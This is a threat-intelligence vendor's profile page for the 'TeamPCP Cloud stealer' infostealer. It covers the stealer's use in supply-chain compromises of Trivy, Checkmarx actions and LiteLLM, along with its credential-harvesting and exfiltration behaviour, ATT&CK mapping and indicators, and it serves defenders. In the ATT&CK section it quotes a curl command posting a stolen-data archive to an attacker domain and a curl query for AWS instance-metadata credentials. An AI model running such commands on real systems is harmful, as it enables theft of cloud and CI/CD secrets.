Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareRansomwareUsed by 4 actorsExploits 2 CVEs

TeamPCP Cloud stealer

TeamPCP Cloud Stealer is a credential-harvesting infostealer used in TeamPCP supply-chain attacks in March 2026, especially against cloud-native and CI/CD environments. It was deployed through compromised trusted software and developer tooling including Aqua Security Trivy and its GitHub Actions, Checkmarx GitHub Actions and related OpenVSX artifacts, and malicious LiteLLM PyPI releases. The malware self-identifies in source code as "TeamPCP Cloud stealer," which analysts used as a key attribution marker linking the activity to the TeamPCP threat group, also tracked as DeadCatx3, PCPcat, and ShellForce.

Its core behavior is to steal secrets from GitHub Actions runners and developer systems while preserving normal tool functionality to reduce detection. Reported capabilities include dumping GitHub Actions Runner.Worker process memory via /proc/*/mem; harvesting SSH keys; Git credentials; cloud credentials for AWS, Google Cloud, and Microsoft Azure; Kubernetes tokens and secrets; Docker credentials; .env files; database credentials; CI/CD configurations; TLS private keys; VPN data; cryptocurrency wallet data including Solana wallets; and Slack and Discord webhook URLs. Multiple reports also state that it queried the AWS Instance Metadata Service at 169.254.169.254 for IAM credentials and searched repositories and filesystems for exposed secrets.

Collected data was packaged as tpcp.tar.gz, encrypted using AES-256/AES-256-CBC with RSA-4096 hybrid encryption, and exfiltrated to attacker-controlled infrastructure. Reported exfiltration endpoints and related indicators include scan.aquasecurtiy[.]org, checkmarx[.]zone, models.litellm[.]cloud, 45.148.10.212, and 83.142.209.11. Several reports also describe a fallback exfiltration mechanism in which the malware created GitHub repositories named tpcp-docs or docs-tpcp inside victim organizations to store stolen data.

Variants associated with the broader campaign added persistence and post-compromise functionality. In compromised Trivy binaries, the malware reportedly attempted persistence on developer machines via a systemd-backed Python component such as ~/.config/systemd/user/sysmon.py. In malicious LiteLLM releases, a TeamPCP Cloud Stealer variant was deployed alongside a persistence script; version 1.82.8 additionally used a .pth file for execution at Python startup, and reports state it installed a disguised systemd user-service backdoor and attempted Kubernetes lateral movement by deploying privileged pods. The malware was used in attacks that affected CI/CD pipelines and downstream enterprise environments, with reporting linking it to compromises of organizations using the poisoned Trivy, Checkmarx, and LiteLLM components.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
EXPLOITED CVES

Vulnerabilities exploited

2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

2 CVES
CVE-2026-33634Trivy Supply Chain CompromiseExploited in the wild

On 19 March, TeamPCP launched a coordinated multi-channel attack that resulted in CVE-2026-33634, a supply chain compromise affecting the official Trivy distribution infrastructure | Deployed "TeamPCP Cloud Stealer", a purpose-built payload designed for CI/CD runner environments that dumped process memory from the GitHub Actions runner, swept SSH keys, cloud provider credentials, and Kubernetes secrets, then encrypted and exfiltrated the collected data using AES-256 and RSA-4096 to attacker-controlled servers.

via halcyon attacks lookouthalcyon.ai
CVE-2025-29927Next.js Middleware Authorization Bypass via x-middleware-subrequest Header

Their malware consistently self-identifies through an embedded string, “TeamPCP Cloud stealer,” which has become one of the clearest attribution markers across all campaign phases.

via socradar blogsocradar.io
THREAT ACTORS

Groups observed using it

4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
TeamPCP

The threat actor force-pushed 75 of 76 version tags in the aquasecurity/trivy-action repository, redirecting them to malicious commits containing the "TeamPCP Cloud stealer."

via sysdig blogsysdig.com
TeamPCP

Security analysts have linked the activity to the TeamPCP threat group, which has conducted a series of supply chain attacks targeting developer platforms including GitHub, PyPI, npm, and Docker. The group is known for deploying a credential-harvesting tool referred to as the TeamPCP Cloud Stealer.

via teiss newsteiss.co.uk
LAPSUS$

When the infected software runs, the TeamPCP Cloud Stealer searches the system memory and files for digital master keys that allow access to a company’s servers. It specifically hunts for Kubernetes tokens and Solana cryptocurrency wallets.

via hackreadhackread.com
ShellForce

The malware self-identifies as TeamPCP Cloud stealer in a Python comment on the final line of the embedded filesystem credential harvester.

via socket blogsocket.dev
MITRE ATT&CK

Techniques & procedures

24 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

4 techniques
T1078Valid AccountsEvidence1

Cisco Systems... experienced a cyberattack in which threat actors infiltrated its internal development environment using stolen credentials obtained through a recent supply chain compromise... During the incident, attackers obtained multiple Amazon Web Services keys and used them to carry out unauthorized activities across a limited number of Cisco cloud accounts.

T1078.004Cloud AccountsEvidence1

During the incident, attackers obtained multiple Amazon Web Services keys and used them to carry out unauthorized activities across a limited number of Cisco cloud accounts.

T1195Supply Chain CompromiseEvidence6

On March 19, 2026, the threat actor known as TeamPCP compromised Aqua Security's Trivy vulnerability scanner and its associated GitHub Actions, injecting a credential-stealing payload into CI/CD pipelines across thousands of repositories... the same attack pattern subsequently appeared in a second, unrelated GitHub Action for Checkmarx's AST.

T1195.001Compromise Software Dependencies and Development ToolsEvidence1

Tag-based action references (e.g., @v2) were subverted by force-pushing tags to malicious commits. Only commit SHA pinning would have been immune.

Execution

2 techniques
T1204User ExecutionEvidence1

Endor Labs reports that threat actors pushed out two malicious versions of LiteLLM today, each containing a hidden payload that executes when the package is imported.

T1574Hijack Execution FlowEvidence3

Force-pushed malicious code to 76 of 77 version tags in aquasecurity/trivy-action and all 7 tags in aquasecurity/setup-trivy; Published a weaponized Trivy binary (v0.69.4) to GitHub Releases, Docker Hub, GHCR, ECR Public, and deb/rpm repositories.

Persistence

4 techniques
T1037Boot or Logon Initialization ScriptsEvidence1

Version 1.82.8 introduces a more aggressive feature that installs a '.pth' file named 'litellm_init.pth' to the Python environment. Because Python automatically processes all '.pth' files when the interpreter starts, the malicious code would be executed whenever Python is run.

T1078Valid AccountsEvidence1

Cisco Systems... experienced a cyberattack in which threat actors infiltrated its internal development environment using stolen credentials obtained through a recent supply chain compromise... During the incident, attackers obtained multiple Amazon Web Services keys and used them to carry out unauthorized activities across a limited number of Cisco cloud accounts.

T1078.004Cloud AccountsEvidence1

During the incident, attackers obtained multiple Amazon Web Services keys and used them to carry out unauthorized activities across a limited number of Cisco cloud accounts.

T1543.002Systemd ServiceEvidence2

The cloud stealer payload also includes an additional base64 encoded script that is installed as a systemd user service disguised as a "System Telemetry Service," which periodically contacts a remote server at checkmarx[.]zone to download and execute additional payloads.

Privilege Escalation

4 techniques
T1037Boot or Logon Initialization ScriptsEvidence1

Version 1.82.8 introduces a more aggressive feature that installs a '.pth' file named 'litellm_init.pth' to the Python environment. Because Python automatically processes all '.pth' files when the interpreter starts, the malicious code would be executed whenever Python is run.

T1078Valid AccountsEvidence1

Cisco Systems... experienced a cyberattack in which threat actors infiltrated its internal development environment using stolen credentials obtained through a recent supply chain compromise... During the incident, attackers obtained multiple Amazon Web Services keys and used them to carry out unauthorized activities across a limited number of Cisco cloud accounts.

T1078.004Cloud AccountsEvidence1

During the incident, attackers obtained multiple Amazon Web Services keys and used them to carry out unauthorized activities across a limited number of Cisco cloud accounts.

T1543.002Systemd ServiceEvidence2

The cloud stealer payload also includes an additional base64 encoded script that is installed as a systemd user service disguised as a "System Telemetry Service," which periodically contacts a remote server at checkmarx[.]zone to download and execute additional payloads.

Stealth

5 techniques
T1027Obfuscated Files or InformationEvidence1

The malicious code was injected into 'litellm/proxy/proxy_server.py' as a base64 encoded payload, which is decoded and executed whenever the module is imported.

T1036MasqueradingEvidence1

Egress traffic was routed via POST requests to typosquatted domains designed to blend into manual log reviews scan.aquasecurtiy[.]org for Trivy, and checkmarx.zone (83.142.209.11) or audit.checkmarx.cx for Checkmarx.

T1078Valid AccountsEvidence1

Cisco Systems... experienced a cyberattack in which threat actors infiltrated its internal development environment using stolen credentials obtained through a recent supply chain compromise... During the incident, attackers obtained multiple Amazon Web Services keys and used them to carry out unauthorized activities across a limited number of Cisco cloud accounts.

T1078.004Cloud AccountsEvidence1

During the incident, attackers obtained multiple Amazon Web Services keys and used them to carry out unauthorized activities across a limited number of Cisco cloud accounts.

T1574Hijack Execution FlowEvidence3

Force-pushed malicious code to 76 of 77 version tags in aquasecurity/trivy-action and all 7 tags in aquasecurity/setup-trivy; Published a weaponized Trivy binary (v0.69.4) to GitHub Releases, Docker Hub, GHCR, ECR Public, and deb/rpm repositories.

Credential Access

8 techniques
T1003OS Credential DumpingEvidence4

Deployed "TeamPCP Cloud Stealer", a purpose-built payload designed for CI/CD runner environments that dumped process memory from the GitHub Actions runner, swept SSH keys, cloud provider credentials, and Kubernetes secrets...

T1056Input CaptureEvidence1

The Trivy breach also affected the LiteLLM open-source Python library in an attack that infected tens of thousands of devices with its "TeamPCP Cloud Stealer" information-stealing malware.

T1528Steal Application Access TokenEvidence4

When a compromised Trivy action executes in a workflow, it extracts GitHub personal access tokens (PATs) and other secrets from the Runner.Worker process memory. If those tokens have write access to repositories that also use Checkmarx actions, the attacker can use them to push malicious code to additional action dependencies.

T1552Unsecured CredentialsEvidence1

Deployed "TeamPCP Cloud Stealer" ... swept SSH keys, cloud provider credentials, and Kubernetes secrets...

T1552.004Private KeysEvidence1

...swept SSH keys, cloud provider credentials, and Kubernetes secrets...

T1552.005Cloud Instance Metadata APIEvidence2

Cloud metadata harvesting : Queried the AWS Instance Metadata Service (IMDS) at 169.254.169.254 for IAM credentials... IMDS credential harvesting : curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

T1555Credentials from Password StoresEvidence4

Once triggered, the payload runs a three-stage attack: it harvests credentials (SSH keys, cloud tokens, Kubernetes secrets, crypto wallets, and .env files)... The stealer harvests a wide range of credentials and authentication secrets.

T1649Steal or Forge Authentication CertificatesEvidence1

TeamPCP Cloud Stealer, a purpose-built payload designed for CI/CD runner environments that dumped process memory from the GitHub Actions runner, swept SSH keys, cloud provider credentials, and Kubernetes secrets

Discovery

1 technique
T1082System Information DiscoveryEvidence1

System reconnaissance by running the hostname, pwd, whoami, uname -a, ip addr, and printenv commands.

Collection

2 techniques
T1056Input CaptureEvidence1

The Trivy breach also affected the LiteLLM open-source Python library in an attack that infected tens of thousands of devices with its "TeamPCP Cloud Stealer" information-stealing malware.

T1560Archive Collected DataEvidence1

To bypass network data loss prevention systems, the script bundled the data into an archive named tpcp.tar.gz and encrypted it using an AES-256-CBC symmetric cipher

Command and Control

1 technique
T1105Ingress Tool TransferEvidence3

The cloud stealer payload also includes an additional base64 encoded script that is installed as a systemd user service disguised as a "System Telemetry Service," which periodically contacts a remote server at checkmarx[.]zone to download and execute additional payloads.

Exfiltration

3 techniques
T1041Exfiltration Over C2 ChannelEvidence5

...then encrypted and exfiltrated the collected data using AES-256 and RSA-4096 to attacker-controlled servers.

T1567Exfiltration Over Web ServiceEvidence2

curl -s -o /dev/null -w %{http_code} -X POST https://checkmarx[.]zone ... --data-binary @/tmp/tmp.XXXXXXXXXX/tpcp.tar.gz

T1567.001Exfiltration to Code RepositoryEvidence2

If the primary command-and-control channel failed, the malware fell back to creating a repository called tpcp-docs inside the victim's own GitHub organization and storing stolen secrets there.

INDICATORS OF COMPROMISE

IOCs tracked for this family

143 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
24 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
114 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
5 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app1 day ago
uri●●●●●●●●●●●●View more in app7 days ago
domain●●●●●●●●●●●●View more in app10 days ago
domain●●●●●●●●●●●●View more in app14 days ago
ip.v4●●●●●●●●●●●●View more in app23 days ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
ACTIVITY FEED

Recent activity

23 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

23 SOURCESView more in app
bleeping computerNews
May 20, 2026
GitHub investigates internal repositories breach claimed by TeamPCP

An information-stealing malware used in a supply-chain attack that infected tens of thousands of devices via the compromised LiteLLM open-source Python library.

Read more
halcyon attacks lookoutNews
Apr 17, 2026
Trivy Supply Chain Compromise Enters Extortion Phase as Vect Ransomware Publishes First Victim

A purpose-built stealer for CI/CD runner environments that harvests process memory, SSH keys, cloud credentials, and Kubernetes secrets, encrypts the stolen data, and exfiltrates it to attacker-controlled infrastructure. It also has a fallback exfiltration method using a repository named tpcp-docs inside the victim GitHub organization.

Read more
halcyon attacks lookoutNews
Apr 17, 2026
Trivy Supply Chain Compromise Enters Extortion Phase as Vect Ransomware Publishes First Victim

A purpose-built stealer for CI/CD runner environments that harvests process memory, SSH keys, cloud credentials, and Kubernetes secrets, then encrypts and exfiltrates the stolen data. It also has a fallback exfiltration mechanism using a repository named tpcp-docs inside the victim's GitHub organization.

Read more
socradar blogNews
Apr 9, 2026
Dark Web Profile: TeamPCP

Credential-stealing malware used across TeamPCP campaign phases to harvest secrets from CI/CD runners and victim environments, package them, encrypt them, and exfiltrate them for follow-on compromise.

Read more
+19 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching143

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution4

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities2

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping24

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.